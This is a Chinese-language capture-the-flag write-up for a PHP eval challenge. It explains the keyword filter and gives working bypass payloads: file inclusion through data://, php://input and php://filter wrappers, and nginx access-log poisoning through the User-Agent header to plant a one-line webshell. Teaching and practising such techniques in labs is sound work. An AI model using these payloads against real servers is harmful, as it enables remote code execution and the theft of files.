前置知识

协议相关博客：https://blog.csdn.net/m0_73353130/article/details/136212770
include：include "filename"这是最常用的方法，除此之外还可以 include url，被包含的文件会被当做代码执行。
data://： PHP 支持的一种数据流协议，用于将数据直接嵌入到代码中。相关博客：data://协议
data://text/plain：要求按照文本格式将内容嵌入代码中，使用方法：data://text/plain,content
php://input：读取原始的POST数据，只能读一次。详情看这里https://docs.pingcode.com/ask/45614.html
php://filter：过滤器，以一定的规则处理要读写的文件。详情：https://blog.51cto.com/u_16248628/7588596

user-agent：一个特殊字符串头，使得服务器能够识别客户使用的操作系统及版本、CPU 类型、浏览器及版本、浏览器渲染引擎、浏览器语言、浏览器插件等。

信息收集

更多的过滤，我大概猜测一下每一个过滤的用意
flag：不能直接输入文件名
system：不许使用system函数
php：不许输入flag.php，不能使用<?php ?>
cat：不许执行系统指令cat
sort：系统命令，将文本内容排序后输出，类似cat
shell：不许使用shell_exec
.：不许使用flag.php，不许使用字符拼接，php中可以用.拼接字符串例如 $a="12" $b="34" $a.$b==="1234"
空格：系统命令中多需要空格，例如tac flag.php
'：不允许自定义字符串
`（反引号）：不允许使用shell命令。`ls` 效果等同于shell_exec('ls')
echo：不允许使用echo打印
;：不允许使用;在代码结尾，这使得函数执行更为困难了
(：不允许使用函数
/i：忽略大小写

error_reporting(0);
if(isset($_GET['c'])){$c = $_GET['c'];if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(/i", $c)){eval($c);}}else{highlight_file(__FILE__);
}

---

解题

如果需要使用空格，那么参看 ASCII码表， %09-%0D上只要有一个能够使用，那么就能绕过空格过滤，例如：tac%0aflag.php，推荐使用最常用的%0a
不能使用函数了，因为括号被限制了。连 ` 也被限制了，系统命令也不行了
include是不需要括号的，所以我们可以考虑从include入手。

发现一个好玩的东西：这里为什么一定要加一个函数而不是直接类如?c=$_GET["1"]?>&1=xxx;呢，原因是
例如c=$_GET[1]&1=echo 123;，eval($_GET[c]) ⇒ eval("$_GET[1]") ⇒ "echo 123;"，第一次系统自动换算$_GET[c]，第二次使用eval解析字符串 "$_GET[1]"，得到结果echo 123;

方法1.1

方法1将以协议相关的方法进行尝试

下面语句的意思是
eval($_GET[c]); ⇒ eval("include$_GET[1]") ⇒ include$_GET[1] ⇒ include "data://text/plain,<?php system("tac flag.php") ?>" ⇒ <?php system("tac flag.php") ?>

?c=include$_GET[1]?>&1=data://text/plain,<?php system("tac flag.php") ?>

其中?>利用了php的机制，当遇到?>时会自动添加一个;，也就是说<?php ehco 123 ?> 和<?php ehco 123; ?>等效。我们利用这个机制绕过;的过滤。
使用$_GET[1]中转一次是因为太多东西被过滤了，非常不方便

---

方法1.2

下面语句的意思是
eval($_GET[c]); ⇒ eval("include$_GET[1]") ⇒ include$_GET[1] ⇒ include php://input

?c=include$_GET[1]?>&1=php://input

post:

<?php system('ls')?>

在使用google的hackbar时需要注意，使用raw模式，basic模式下后台无法获取到不带=的post数据。
原因：https://github.com/0140454/hackbar/issues/56

---

方法1.3

这一类方法的主要目的是读取文件，并让<?php标签失效，以文本显示代码
将flag.php以base64加密的方法读取，这会将一串base64显示到页面上，拿去解密即可获取flag

?c=include$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php

类似的，把ascii编码变成utf-16编码

?c=include$_GET[1]?>&1=php://filter/read=convert.iconv.ascii.utf-16/resource=flag.php

---

方法2

user-agent
之前都是使用过滤器，那么不用过滤器行不行，当然行啊，不行我肯定不写出来了。
我们包含/var/log/nginx/access.log
你问为什么我知道是这个目录
apache日志存放路径：/var/log/apache/access.log
Ngnix日志存放路径：/var/log/nginx/access.log 和 /var/log/nginx/error.log
没有放这里或者没开启日志，那就用不了

有没有发现这个玩意很熟悉，这不就是user-agent吗

利用原理：每次都会将user-agent写入日志里，如果传入的日志里有恶意代码，也会被写道日志里，但代码此时并不会被运行。由于我们使用了include包含日志文件，日志文件中的<?php ... ?>标签中的代码会被当做代码执行，而其他文本当做普通文本显示。

写一句话木马

<?php eval($_POST[2]) ?>

然后拿蚁剑连接它，之前想要直接用system(“tac flag.php”)的，没反应，只能蚁剑连，原因不详。
蚁剑使用参看[ctfshow web入门] web31

蚁剑连接，接不上url写成http没有s，一句话木马写$_REQUEST或者$_POST，不要用$_GET

url/?c=include$_GET[1]?>&1=/var/log/nginx/access.log
密码：2    因为$_POST[2]

web31    目录    web33